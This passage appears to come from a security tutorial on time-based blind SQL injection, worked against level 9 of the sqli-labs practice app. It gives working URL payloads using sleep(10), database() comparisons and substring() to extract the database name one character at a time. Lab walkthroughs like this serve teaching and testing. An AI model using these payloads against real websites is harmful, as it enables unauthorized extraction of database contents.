Time to move on to time-based SQLi.
Time based SQLi
The process is almost the same as boolean-based. The thing that changes is the way to identify a true condition. Let’s visit level 9 of sqlilabs.
The way to identify a true condition is using the function sleep:
True) and sleep(10)
Let’s verify that it works properly:
http://192.168.1.11/sqli-labs-master/Less-9/?id=1' and sleep(10) --+
And the web page takes 10 seconds to load:
And now we perform the first query, if 1=1 it would wait 10 seconds:
http://192.168.1.11/sqli-labs-master/Less-9/?id=1' and sleep(10) and 1=1 --+
Next step is to extract useful information:
http://192.168.1.11/sqli-labs-master/Less-9/?id=1' and sleep(10) and database()='security' --+
And the way to extract the database name, or anything that we need is using again the substring function.
http://192.168.1.11/sqli-labs-master/Less-9/?id=1' and sleep(10) and substring(database(),1,1)='s' --+